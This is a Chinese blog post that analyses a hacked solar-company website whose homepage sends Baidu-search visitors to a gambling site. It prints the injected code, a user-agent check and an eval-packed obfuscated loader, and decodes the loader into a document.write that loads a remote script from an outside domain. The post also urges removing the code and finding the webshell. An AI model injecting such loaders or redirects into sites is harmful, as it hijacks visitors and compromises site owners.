上午上q,刚登上去,老铁跟我讲被欺负了,网站从百度搜索进去,首页出现转到菠菜(博彩)网,研发机构的说可能是百度的问题,不是咱们的问题,这种判断能力我只能说智商堪忧,又是xxxxx的网站研发机构。
直接进入正题,直接site:www.zyisolar.com
打开首页出现了转,到
https://www.365da8s.com/zh-cn/这个菠菜,其他页面
无,劫持代码只放在首页,
咱们直接看代码
倘若是没法直接从首页查看源码的状况,那样在浏览器输入view-source:域名 就能够查看网页源码
只需要看头部代码好熟练,黑帽seo这行技术这几年亦没什么创新,删除这两行就能够处理基本问题
if (
navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="中亿光伏-品牌光伏集成商"}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return\\w+};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(\\b+e(c)+\\b,g),k[c]);return p;}(l["\\e\\c\\1\\n\\f\\8\\o\\0"]["\\7\\3\\9\\0\\8"](\\\g\\2\\1\\3\\9\\4\\0 \\0\\m\\4\\8\\d\\6\\0\\8\\j\\0\\5\\h\\a\\k\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\t\\0\\0\\4\\2\\u\\5\\5\\7\\7\\7\\b\\v\\1\\e\\a\\2\\q\\b\\1\\c\\f\\5\\r\\p\\s\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\);,32,32,x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x78|x76|window|x79|x75|x6e|x36|x38|x33|x35|x68|x3a|x62.split(|),0,{}))</script>
Keywords和description进行Unicode解码,结果:
bet365官方平台开户,bet365官方备用网址,bet365官方网站是多少,bet365官方亚洲版,bet365.com官方网站,bet365官方投注,bet365官方网站,bet365官方中文版,bet365中文官方网站,英国bet365官方网,bet365官方投注网站,bet365官方投注网址,bet365官方网投,bet365官方备用,bet365官方网站是多
if (
navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="中亿光伏-品牌光伏集成商"}</script>这段意思
便是判断百度搜索拜访用户进行转,你去360,搜狗搜索
拜访肯定是不会
出现转的
而后咱们再来解最后一段代码
先进行js解压,得出结果
javascript代码方式解密
1:\x64\x6f\x63\x75\x6d\x65\x6e\x74 结果 document
2:\x77\x72\x69\x74\x65 结果 write
3:\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x63\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x33\x36\x35\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
结果
https://www.bcdas8.com/365.js"></script>
整段的解密结果便是:
<script type="text/javascript"> window["document"]["write"] (<script type="text/javascript" src="https://www.bcdas8.com/365.js"></script>); </script>
到了这儿全部过程已然很清晰了,虽然咱们删除了这段代码但只能暂时处理问题,需要找出webshell,做一个全面的网站和服务器安全策略,这种批量GetShell的基本上都是经过日前已然开放的漏洞,因此相对还是比较容易处理
大都数人对网站的理解还停留在视觉层面,网络安全的重要性反而被忽略,曾经我亦主攻过渗透攻防,以打击菠菜(博彩)和成人色情,传销等网站服务器为乐,我触及这块技术的目的不是为了干点什么,而是为认识决问题。任何公司需要加强对网络安全的注重,找网络研发机构亦要避免入坑